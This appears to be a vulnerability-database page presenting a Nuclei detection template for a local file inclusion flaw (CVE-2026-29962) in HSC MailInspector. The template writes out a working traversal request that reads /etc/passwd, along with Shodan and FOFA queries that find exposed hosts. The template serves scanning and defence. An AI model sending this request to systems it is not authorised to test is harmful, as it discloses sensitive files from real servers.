Lucene search
+L

HSC MailInspector - Local File Inclusion

🗓️ 11 Sep 2026 05:22:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

LFI in HSC MailInspector v5.3.3-7 via phpunit.php path traversal lets attackers read files.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-29962
18 May 202600:00
attackerkb
cnnvd
CNNVD
HSC MailInspector 安全漏洞
18 May 202600:00
cnnvd
cve
CVE
CVE-2026-29962
18 May 202600:00
cve
cvelist
Cvelist
CVE-2026-29962
18 May 202600:00
cvelist
githubexploit
GithubExploit
cve-disclosures
21 Jan 202613:43
githubexploit
euvd
EUVD
EUVD-2026-30781
18 May 202600:00
euvd
nvd
NVD
CVE-2026-29962
18 May 202618:17
nvd
ptsecurity
Positive Technologies
PT-2026-41705
18 May 202600:00
ptsecurity
redhatcve
RedhatCVE
CVE-2026-29962
19 May 202619:57
redhatcve
vulnrichment
Vulnrichment
CVE-2026-29962
18 May 202600:00
vulnrichment
id: CVE-2026-29962

info:
  name: HSC MailInspector - Local File Inclusion
  author: str4k3r
  severity: high
  description: |
    HSC MailInspector v5.3.3-7 contains a path traversal caused by improper control of user-supplied file paths in /vendor/phpunit/phpunit.php, letting remote attackers read arbitrary files, exploit requires crafted request.
  impact: |
    Remote attackers can read arbitrary files, potentially disclosing sensitive information from the system.
  remediation: |
    Update to the latest version.
  reference:
    - https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md
    - https://nvd.nist.gov/vuln/detail/CVE-2026-29962
  classification:
    cve-id: CVE-2026-29962
    epss-score: 0.00372
    epss-percentile: 0.30506
    cwe-id: CWE-73
    cvss-score: 7.5
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  metadata:
    verified: true
    max-request: 1
    vendor: hsclabs
    product: mailinspector
    shodan-query: http.html:"mailinspector"
    fofa-query: body="mailinspector"
  tags: cve,cve2026,mailinspector,php,phpunit,lfi

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector"

    redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "/mailinspector/"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/vendor/phpunit/phpunit.php?--bootstrap=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "root:x:0:0:"
# digest: 4a0a0047304502200c520bfab05076be9016209ff3e8adbc57efa4c1b539bc8fab3ca3f14d1255f3022100d8eb372fdf52b57fd349d20e571a67186c4b4fe896f9632b137c6277469d1a8b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Sep 2026 07:13Current
CVSS 3.17.5
EPSS0.00372
SSVC
3